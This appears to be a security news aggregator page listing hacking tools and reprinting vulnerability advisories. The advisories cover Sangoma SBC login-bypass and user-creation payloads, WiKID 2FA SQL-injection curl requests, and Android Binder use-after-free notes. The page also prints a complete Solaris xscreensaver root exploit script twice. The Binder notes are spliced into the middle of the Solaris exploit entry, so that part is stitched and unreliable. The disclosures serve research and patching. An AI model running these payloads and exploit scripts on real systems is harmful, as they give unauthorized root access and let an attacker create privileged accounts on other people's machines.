An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

image
FOCA (Fingerprinting Organizations with Collected Archives) FOCA is a tool used mainly to find metadata and hidden information in the documents it scans . These documents may be on web pages, and can be downloaded and analysed with FOCA. It is capable of analysing a wide variety of documents, with the most common being Microsoft Office , Open Office , or PDF files, although it also analyses Adobe InDesign or SVG files, for instance. These documents are searched for using three possible search engines: Google , Bing , and DuckDuckGo . The sum of the results from the three engines amounts to a lot of documents. It is also possible to add local files to extract the EXIF information from graphic files, and a complete analysis of the information discovered through the URL is conducted even before downloading the file. Releases Check here our latest releases. Requisites To run the solution locally the system will need: Microsoft Windows (64 bits). Versions 7, 8, 8.1 and 10. Microsoft .NET Framework 4.7.1 . Microsoft Visual C++ 2010 x64 or greater. An instance of SQL Server 2014 or greater. Notes When starting the app the system will check if there is a SQL Server instance available. If none is found, the system will prompt a window for introducing a connection string. Stay tuned Get the news about our latest doings and send us a message. https://twitter.com/Fear_the_Foca Further reading …

image
IoT-Implant-Toolkit is a framework of useful tools for malware implantation research of IoT devices. It is a toolkit consisted of essential software tools on firmware modification, serial port debugging, software analysis and stable spy clients. With an easy-to-use and extensible shell-like environment, IoT-Implant-Toolkit is a one-stop-shop toolkit simplifies complex procedure of IoT malware implantation. In our research, we have succcessfully implanted Trojans in eight devices including smart speakers, cameras, driving recorders and mobile translators with IoT-Implant-Toolkit. A demo video below: How to use Installation Make sure you have git, python3 and setuptools installed. For audio processing and playing, you should install alsa(built-in in linux), sox and ffplay. On ubuntu18.04: $ sudo apt install sox ffmpeg Download source code from our Github: $ git clone https://github.com/arthastang/IoT-Implant-Toolkit.git Set up environment and install dependencies: $ cd IoT-Implant-Toolkit/ $ python3 setup.py install Run Run the toolkit: $ python3 -B IoT-Implant-Toolkit.py _____ _______ _____ _ _ _______ _ _ _ _ |_ _| |__ __| |_ _| | | | | |__ __| | | | (_) | | | ___ | |______| | _ __ ___ _ __ | | __ _ _ __ | |_ ______| | ___ ___ | | | ___| |_ | | / _ | |______| | | ‘_ ` _ | ‘_ | |/ _` | ‘_ | __|______| |/ _ / _ | | |/…

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to bypass authentication and login as a non-existent user but with complete access to the dashboard including additional privileged user creation capabilities.

MD5 | c7bef35c45a63e788f4ff3d40f567394

## Introduction

### Description

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to bypass authentication and login as a non-existen user but with complete access to the dashboard including additional privileged user creation capabilities.

### Vulnerability Type

- Argument Injection or Modification (https://cwe.mitre.org/data/definitions/88.html)

## Product Overview

A Sangoma SBC protects both your data and voice network and is designed to handle every aspect of phone calls that travel over the internet (or voice-over-ip phone calls).

## Background

The Sangoma SBC web application heavily relies on the python script `/usr/local/sng/bin/sng-user-mgmt` for various user operations including authenticating the user that is supplied on the login screen of the web application.

When a username and password is provided to the application, it is processed by `/var/webconfig/gui/Webconfig.inc.php` which uses the `Execute` function from `/var/webconfig/api/ShellExec.class.php` to pass the credentials to `/usr/local/sng/bin/sng-user-mgmt` as arguments. The `Execute` function applies the `escapeshellcmd` function to convert any shell characters as literals, however there is no verification that the variables passed do not contain strings that can be interpreted as additional arguments to `/usr/local/sng/bin/sng-user-mgmt`.

The `/var/webconfig/gui/Webconfig.inc.php` calls the `WebSetSessionAuthenticated()` function if the return value of the `$shell->Execute($cmd, $args, true, array('log','escape'=>true))` is 0 as shown below.

```
$rc = $shell->Execute($cmd, $args, true, array('log','escape'=>true));
if(0 == $rc){
...
...
WebSetSessionAuthenticated();
}else{
Logger::SysLog("webconfig", "login - ${username} login failed");
...
...
}
```

The Operating System returns a 0 if the `/usr/local/sng/bin/sng-user-mgmt` program exits successfully.

This is true for all arguments of the program unless an explicit status code is sent back to the Operating System. Invoking the help menu, for example is also a successful execution of the program as can be seen from the below two commands

```
# /usr/local/sng/bin/sng-user-mgmt -h
Usage: sng-user-mgmt [options] arg

Options:
-h, --help show this help message and exit
-a ACTION, --action=ACTION
Action to perform.
-u USER, --user=USER User Name
-s, --syslog Log to syslog
-p PASSWORD, --password=PASSWORD
Password
-f FORCE, --force=FORCE
Force to remove a user
-n NAME, --name=NAME User Name
-e ENCRYPTEDPASSWORD, --encrypted-password=ENCRYPTEDPASSWORD
Encrypted Password
-d HASHEDPASSWORD, --hashed-password=HASHEDPASSWORD
Hashed Password
-l ACCESS, --access=ACCESS
Toggle user login access, ie. Enable / Disable
-o, --sudoer Add to sudoer list
root@sangoma-test ~
# echo $?
0
```

As the status code is 0, the check in `/var/webconfig/gui/Webconfig.inc.php` passes and a new user session is created.

Passing additional arguments through the username field that would cause the `sng-user-mgmt` to return a 0 would result in a session being created without any valid credentials being supplied. This session provides complete access to the application, including the ability to create additional sudo privilged users.

## Proof of Concept Exploit

1. Pass a username with the value `adam -h`
2. The password field can be set to anything as this will be ignored
3. Click login
4. The `-h` invokes the help menu for `sng-user-mgmt`, returning a 0 and causing `Webconfig.inc.php` to create a new session.
5. You are now logged in

## Versions Tested

- 2.3.23-119-GA

## Vendor Response

This issue has been responsibly disclosed to the vendor for which a patch has been released in version 2.3.24

https://wiki.sangoma.com/display/SBC/SBC+Downloads

## Credits

Appsecco Security Team
http://www.appsecco.com

## Timeline

18th May 2019: Discovered and reported to vendor
21st May 2019: Vendor confirmation
23rd July 2019: Fixed version (2.3.24) released

## Reference

- [https://www.sangoma.com/products/sbc/](https://www.sangoma.com/products/sbc/)


Riyaz Walikar

+91 9886042242

www.appsecco.com

Appsecco is a registered trademark of Appsecco Ltd. Appsecco Limited: Registration Number: 9500721. Registered office: Kemp House, 152 to 160 City Road, London EC1V 2NX, United Kingdom. This email message is intended for the named recipient only. It may be privileged and/or confidential. If you are not the named recipient of this email please notify us immediately and do not copy it or use it for any purpose, nor disclose its contents to any other person.



Source

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to create a privileged user on the system using the web application login interface.

MD5 | 35eba4e323bb1cd503763d9011a57ea5

## Introduction

### Description

A remotely exploitable vulnerability exists in the 2.3.23-119-GA version of Sangoma SBC that would allow an unauthenticated user to create a privileged user on the system using the web application login interface.

### Vulnerability Type

- Argument Injection or Modification (https://cwe.mitre.org/data/definitions/88.html)

## Product Overview

A Sangoma SBC protects both your data and voice network and is designed to handle every aspect of phone calls that travel over the internet (or voice-over-ip phone calls).

## Background

The Sangoma SBC web application heavily relies on the python script `/usr/local/sng/bin/sng-user-mgmt` for various user operations including authenticating the user that is supplied on the login screen of the web application.

When a username and password is provided to the application, it is processed by `/var/webconfig/gui/Webconfig.inc.php` which uses the `Execute` function from `/var/webconfig/api/ShellExec.class.php` to pass the credentials to `/usr/local/sng/bin/sng-user-mgmt` as arguments. The `Execute` function applies the `escapeshellcmd` function to convert any shell characters as literals, however there is no verification that the variables passed do not contain strings that can be interpreted as additional arguments to `/usr/local/sng/bin/sng-user-mgmt`.

For example, when a username `root` and password `secure` is passed to the application, the final command that is created by `Execute` to be run is `/usr/local/sng/bin/sng-user-mgmt --action=login --user=ha --encrypted-password=ENCPASS(secure)`

By inspecting the code and help menu of `/usr/local/sng/bin/sng-user-mgmt`, we see that the `action` parameter supports other modes which includes `add` that creates a user. The `-o` option can be used to make the user have sudo privileges when `--action=add` is used.

Passing additional arguments through the username field results in a new privileged user being created on the system.

## Proof of Concept Exploit

1. Pass a username with the value `john --action=add -p StrongPass1 -o`
2. The password field can be set to anything as this will be ignored
3. Click login
4. A local user with sudo privileges called `john` with password `StrongPass1` will be created
5. An attacker can SSH into the machine with these credentials or login via the web console

## Versions Tested

- 2.3.23-119-GA

## Vendor Response

This issue has been responsibly disclosed to the vendor for which a patch has been released in version 2.3.24

https://wiki.sangoma.com/display/SBC/SBC+Downloads

## Credits

Appsecco Security Team
http://www.appsecco.com

## Timeline

18th May 2019: Discovered and reported to vendor
21st May 2019: Vendor confirmation
23rd July 2019: Fixed version (2.3.24) released

## Reference

- [https://www.sangoma.com/products/sbc/](https://www.sangoma.com/products/sbc/)


Riyaz Walikar

+91 9886042242

www.appsecco.com

Appsecco is a registered trademark of Appsecco Ltd. Appsecco Limited: Registration Number: 9500721. Registered office: Kemp House, 152 to 160 City Road, London EC1V 2NX, United Kingdom. This email message is intended for the named recipient only. It may be privileged and/or confidential. If you are not the named recipient of this email please notify us immediately and do not copy it or use it for any purpose, nor disclose its contents to any other person.



Source

WiKID Systems 2FA Enterprise Server version 4.2.0-b2032 suffers from cross site request forgery, cross site scripting, and remote SQL injection vulnerabilities.

MD5 | 87e4bf80dc5a6746b499ffb6cb16fe9c

WiKID Systems 2FA Enterprise Serverversion 4.2.0-b2032 and earlier was
found to be vulnerable to multiple Cross-Site Scripting, SQLi, and CSRF
issues.

*searchDevices.jsp* is vulnerable to SQL injection through the *uid* and
*domain* parameters. The application uses Postgres which supports Stacked
Queries, the issue can be seen by submitting a request like:

SLEEP=10; HOST=$RHOST; COOKIE=$COOKIE; time curl -v -i -s -k -X
'POST' -H "Host: $HOST" -H "Cookie: JSESSIONID=$COOKIE;" --data-binary
"uid=test&domain=1;select pg_sleep($SLEEP);--&action=Search"
https://$HOST/WiKIDAdmin/searchDevices.jsp

The request will cause the database to sleep for 10+ seconds. This issue
has been assigned *CVE-2019-16917*.

*processPref.jsp* is vulnerable to SQL injection through the *key* parameter
if the action parameter is set to *update.* The following request will
trigger the issue for an authenticated user:

https://$RHOST/WiKIDAdmin/processPref.jsp?action=Update&key=test%27;%20SELECT%20pg_sleep(5);--

The request will cause the database to sleep for 5+ seconds. This issue
has been assigned *CVE-2019-17117.*

*Logs.jsp* is vulnerable to SQL injection through the *substring *and
*source* parameters. The following request will demonstrate the issue:

time curl --output /dev/null -s -k -H "Cookie: JSESSIONID=$COOKIE"
--data-binary "source='; select pg_sleep(5);--"
https://$RHOST/WiKIDAdmin/Log.jsp

real 0m10.572s
user 0m0.008s
sys 0m0.016s

The request will cause the database to sleep for 5+ seconds. This issue
has been assigned *CVE-2019-17119*

*usrPreregistration.jsp *is vulnerable to cross site scripting by uploading
a malicious .csv file containing elements. This issue has been
assigned *CVE-2019-17114*

*Logs.jsp *is vulnerable to cross site scripting by triggering errors in
the unauthenticated portion of the application. The errors are severe
enough to appear in the logs by default. This issue has been assigned
*CVE-2019-17115.*

*groups.jsp *is vulnerable to cross site scripting by creating a group with
a name that contains elements. This issue has been assigned
*CVE-2019-17116*

*adm_usrs.jsp *is vulnerable to cross site scripting when an admin is
created with a username containing elements. This issue has been
assigned *CVE-2019-17120*

The application does not implement CSRF protection. Tricking an
authenticated user to click a link like:

WiKIDAdmin
Manual


Will result in an admin user unintentionally being created. This issue has
been assigned *CVE-2019-17118*

https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-csrf
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-cross-site-scripting
https://www.securitymetrics.com/blog/wikid-2fa-enterprise-server-sql-injection

AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE P:801.995.6999
[image: SecurityMetrics]


Source

These are notes on further exploitation of the Android Binder use-after-free vulnerability as noted in CVE-2019-2215 and leveraged against Kernel 3.4.x and 3.18.x on Samsung Devices using Samsung Android and LineageOS.

MD5 | 615c42102bb321281534f993eefa6acb

# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation
# Date: 2019-10-16
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/
# Version: Solaris 11.x
# Tested on: Solaris 11.4 and 11.3 X86
# CVE: N/A

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation SunOS 5.11 11.4 Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi "
echo

# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -
thread:e4fb2e00

I see proc->task_list ...

PoC:

[ 642.254192] wq queue:e7ce8798
[ 642.254201] epoll struct:e7ce8780
[ 642.254214] wq queue:e7ce8f98
[ 642.254220] epoll struct:e7ce8f80
[ 642.254230] wq queue:e7ce8718
[ 642.254236] epoll struct:e7ce8700
[ 642.254266] binder_ioctl: 7392:7392 40046208 0
[ 642.254274] iovec str size:8
[ 642.254280] thread->task_list:e5389b30
[ 642.254286] proc->task_list:c309d86c
[ 642.254292] binder_free_thread size:252 worker_off:44
[ 642.254299] freed thread:e5389b00
[ 642.254736] ep_unregister_pollwait struct:e7ce8780 epi struct:e51d0480
[ 642.254792] ep_unregister_pollwait struct:e7ce8f80 epi struct:e51d0a80
[ 642.254799] ep_unregister_pollwait list not empty
[ 642.254805] whead before
[ 642.254811] my2= c0f50cc4 c0f50cc4
[ 642.254817] remove wait queue:e734b994
[ 642.254823] remove wait queue task list:e734b9a0
[ 642.254830] ep_unregister_pollwait list not empty
[ 642.254835] whead before
[ 642.254841] my2= c0f50cd0 c0f50cd0
[ 642.254847] remove wait queue:e734bb24
[ 642.254852] remove wait queue task list:e734bb30
[ 642.254863] ep_free
[ 642.254873] ep_free
[ 642.254881] ep_free

However bug is not triggered in my PoC. I cannot see doubly list entiries under thread and proc :/


Here is where the use after free bug should come in.

Code:

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);

When this is called, the binder_thread structure is freed in the kernel.

Immediately after the parent process calls:

Code:

b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);

In the kernel, memory is allocated to copy over iovec_array from userspace. This poc depends on the pointer from this allocation, to be the same as the recently freed binder_thread memory.

Then, when the child process exits, the EPOLL cleanup will use the waitqueue in the binder_thread structure, that has been overwritten with the values in iovec_array. When EPOLL cleanup unlinks the waitqueue, 0xDEADBEEF will get overwritten by a pointer in kernelspace. This has to happen just before the writev call in the parent process starts to copy over the second buffer, which gets us a kernel space memory leak.

If writev is returning 0x1000 it means the timing is off, the wait queue offset is off, the kmalloc allocation in the writev function isn't the same as the freed binder_thread, or your kernel isn't vulnerable.

```

## Update 1

```
I narrowed it down ... so I want to replicate behavior of com.cyanogenmod.lockclock

It behaves like I want it to see:

s3ve3g:/ # ps | grep 2140
u0_a50 2140 257 845744 36336 sys_epoll_ b4ed9114 S com.cyanogenmod.lockclock

Source:

https://github.com/LineageOS/android_packages_apps_LockClock

[ 53.617686] binder_ioctl: 2140:2401 40046208 0
[ 53.617697] iovec str size:8
[ 53.617704] thread->task_list:e5b2c030
[ 53.617710] proc->task_list:e609206c
[ 53.617716] p list= e609206c e50c3e7c
[ 53.617722] p list= e50c5e7c e609206c
[ 53.617729] binder_free_thread size:252 worker_off:44
[ 53.617736] freed thread:e5b2c000
[ 53.617755] ep_unregister_pollwait struct:e5f5c680 epi struct:e5f4c280
[ 53.617762] ep_unregister_pollwait list not empty
[ 53.617768] whead before
[ 53.617773] my2= e8b10308 e8b10308
[ 53.617779] remove wait queue:e5fd755c
[ 53.617785] remove wait queue task list:e5fd7568
[ 53.617803] ep_free

I think Binder is used here:

https://github.com/LineageOS/android_packages_apps_LockClock/blob/5239d22272aa2b7a2bcf2c45482395da3e163289/src/org/lineageos/lockclock/DeviceStatusService.java

Any idea how to replicate this using C (native) code?


```

Source

Solaris version 11.4 xscreensaver local privilege escalation exploit.

MD5 | 70e56cdc262b3313173bbedcba447cba

@Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16)

Title: Local privilege escalation on Solaris 11.x via xscreensaver
Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4
Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3
Other versions starting from 5.06 are potentially affected
Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3)
Other platforms are potentially affected (see below)
Description: A local attacker can gain root privileges by exploiting a
design error vulnerability in the xscreensaver distributed with
Solaris
Author: Marco Ivaldi
Vendor Status: notified on 2019-07-09
CVE Name: CVE-2019-3010
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt
https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html
https://www.jwz.org/xscreensaver/
https://www.oracle.com/technetwork/server-storage/solaris11/
https://www.mediaservice.net/
https://0xdeadbeef.info/

1. Abstract.

Exploitation of a design error vulnerability in xscreensaver, as distributed
with Solaris 11.x, allows local attackers to create (or append to) arbitrary
files on the system, by abusing the -log command line switch introduced in
version 5.06. This flaw can be leveraged to cause a denial of service condition
or to escalate privileges to root.

2. Example Attack Session.

raptor@stalker:~$ cat /etc/release
Oracle Solaris 11.4 X86
Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved.
Assembled 16 August 2018
raptor@stalker:~$ uname -a
SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc
raptor@stalker:~$ id
uid=100(raptor) gid=10(staff)
raptor@stalker:~$ chmod +x raptor_xscreensaver
raptor@stalker:~$ ./raptor_xscreensaver
raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
Copyright (c) 2019 Marco Ivaldi
[...]
Oracle Corporation SunOS 5.11 11.4 Aug 2018
root@stalker:~# id
uid=0(root) gid=0(root)

3. Affected Platforms.

This vulnerability was confirmed on the following platforms:

* Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation]
* Oracle Solaris 11.x SPARC [untested]

Previous Oracle Solaris 11 versions might also be vulnerable.

Based on our analysis and on feedback kindly provided by Alan Coopersmith of
Oracle, we concluded that this is a Solaris-specific vulnerability, caused by
the fact that Oracle maintains a slightly different codebase from the upstream
one. Alan explained this as follows:

"The problem in question here appears to be inherited from the long-ago fork
[originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based
unlock dialog with accessibility support to replace the non-accessible Xlib
unlock dialog that upstream provides, which moves the uid reset to after where
the log file opening was later added."

Specifically, the problem arises because of this bit of Solaris patches:
https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770

As an interesting side note, it appears Red Hat dropped this code back in 2002
with version 4.05-5:
https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179

4. Fix.

Oracle has assigned the tracking# S1182608 and has released a fix for all
affected and supported versions of Solaris in their Critical Patch Update (CPU)
of October 2019.

As a temporary workaround, it is also possible to remove the setuid bit from
the xscreensaver executable as follows (note that this might prevent it from
working properly):

bash-3.2# chmod -s /usr/bin/xscreensaver

5. Proof of Concept.

An exploit for Oracle Solaris 11.x has been developed as a proof of concept. It
can be downloaded from:

https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver

#!/bin/sh

#
# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver
# Copyright (c) 2019 Marco Ivaldi
#
# Exploitation of a design error vulnerability in xscreensaver, as
# distributed with Solaris 11.x, allows local attackers to create
# (or append to) arbitrary files on the system, by abusing the -log
# command line switch introduced in version 5.06. This flaw can be
# leveraged to cause a denial of service condition or to escalate
# privileges to root. This is a Solaris-specific vulnerability,
# caused by the fact that Oracle maintains a slightly different
# codebase from the upstream one (CVE-2019-3010).
#
# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs
# "Good hackers force luck." -- ~A.
#
# This exploit targets the /usr/lib/secure/ directory in order
# to escalate privileges with the LD_PRELOAD technique. The
# implementation of other exploitation vectors, including those
# that do not require gcc to be present on the target system, is
# left as an exercise to fellow UNIX hackers;)
#
# Usage:
# raptor@stalker:~$ chmod +x raptor_xscreensaver
# raptor@stalker:~$ ./raptor_xscreensaver
# [...]
# Oracle Corporation SunOS 5.11 11.4 Aug 2018
# root@stalker:~# id
# uid=0(root) gid=0(root)
# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.*
#
# Vulnerable platforms:
# Oracle Solaris 11 X86 [tested on 11.4 and 11.3]
# Oracle Solaris 11 SPARC [untested]
#

echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver"
echo "Copyright (c) 2019 Marco Ivaldi "
echo

# prepare the payload
echo "int getuid(){return 0;}" > /tmp/getuid.c
gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc
if [ $? -ne 0 ]; then
echo "error: problem compiling the shared library, check your gcc"
exit 1
fi

# check the architecture
LOG=/usr/lib/secure/getuid.so
file /bin/su | grep 64-bit >/dev/null 2>&1
if [ $? -eq 0 ]; then
LOG=/usr/lib/secure/64/getuid.so
fi

# start our own xserver
# alternatively we can connect back to a valid xserver (e.g. xquartz)
/usr/bin/Xorg :1 &

# trigger the bug
umask 0
/usr/bin/xscreensaver -display :1 -log $LOG &
sleep 5

# clean up
pkill -n xscreensaver
pkill -n Xorg

# LD_PRELOAD-fu
cp /tmp/getuid.so $LOG
LD_PRELOAD=$LOG su -

Source

image
Custom bash scripts used to automate various penetration testing tasks including recon, scanning, parsing, and creating malicious payloads and listeners with Metasploit. For use with Kali Linux and the Penetration Testers Framework (PTF). Lee Baird @discoverscripts Jay "L1ghtn1ng" Townsend @jay_townsend1 Jason Ashton @ninewires Download, setup, and usage git clone https://github.com/leebaird/discover /opt/discover/ All scripts must be ran from this location. cd /opt/discover/ ./update.sh RECON 1. Domain 2. Person 3. Parse salesforce SCANNING 4. Generate target list 5. CIDR 6. List 7. IP, range, or domain 8. Rerun Nmap scripts and MSF aux WEB 9. Insecure direct object reference 10. Open multiple tabs in Firefox 11. Nikto 12. SSL MISC 13. Parse XML 14. Generate a malicious payload 15. Start a Metasploit listener 16. Update 17. Exit RECON Domain RECON 1. Passive 2. Active 3. Import names into an existing recon-ng workspace 4. Previous menu Passive uses ARIN, dnsrecon, goofile, goog-mail, goohost, theHarvester, Metasploit, URLCrazy, Whois, multiple websites, and recon-ng. Active uses dnsrecon, WAF00W, traceroute, Whatweb, and recon-ng. [*] Acquire API keys for Bing, Builtwith, Fullcontact, GitHub, Google, Hashes, Hunter, SecurityTrails, and Shodan for maximum results with recon-ng and theHarvester. API key locations: recon-ng show keys keys add bing_api <value> theHarvester /opt/theHarvester/api-keys.yaml …

image
yet another dirbuster Common Command line options -a <user agent string> – specify a user agent string to send in the request -c <http cookies> – use this to specify any cookies that you might need (simulating auth). header. -f – force processing of a domain with wildcard results. -l – show the length of the response. -r – follow redirects. -s <status codes> – comma-separated set of the list of status codes to be deemed a "positive" (default: 200,204,301,302,307 ). -u <url/domain> – full URL (including scheme), or base domain name. -v – verbose output (show all results). -w <wordlist> – path to the wordlist used for brute forcing. -b <token> – HTTP Authorization via Bearer token. -P <password> – HTTP Authorization password (Basic Auth only, prompted if missing). -U <username> – HTTP Authorization username (Basic Auth only). Install cargo install rbuster Install in kali apt install libssl-dev pkg-config cargo install rbuster Example $ rbuster -w common.txt -u http://horriblesubs.info/ Rbuster 0.1.0 Vadim Smirnov ===================================================== Url/Domain : http://horriblesubs.info/ Wordlist : common.txt Words : 4593 ===================================================== /thanks (Status: 301 Moved Permanently | Content-Length: 0) /the (Status: 301 Moved Permanently | Content-Length: 0) /ro (Status: 301 Moved Permanently | Content-Length: 0) /robot (Status: 301 Moved Permanently…

image
As the 2020 presidential election draws closer and primary season looms around the corner, Microsoft has launched a bug-bounty program specifically aimed at its ElectionGuard product, which the software giant has positioned as performing “end-to-end verification of elections.” ElectionGuard is a free open-source software development kit that secures the results of elections and makes those results securely available to approved third-party organizations for validation; it also allows individual voters to confirm that their votes were correctly counted. The bounty program invites security researchers (“whether full-time cybersecurity professionals, part-time hobbyists or students”) to probe ElectionGuard for high-impact vulnerabilities and share them with Microsoft under Coordinated Vulnerability Disclosure (CVD). Eligible submissions with a “clear, concise proof of concept” (PoC) are eligible for awards ranging from $500 to $15,000 depending on the severity of the bug found. In-scope products include the ElectionGuard specification and documentation (such as data-transmission issues like information leakage); the verifier reference implementation (bugs that allow attackers to say elections are valid when they aren’t); and C Cryptography implementations (such as bugs that allow key or vote discovery by observing SDK messages). The program is one prong of the company’s wider “Defending Democracy” program, under which Microsoft has pledged to protect campaigns from hacking;…

Source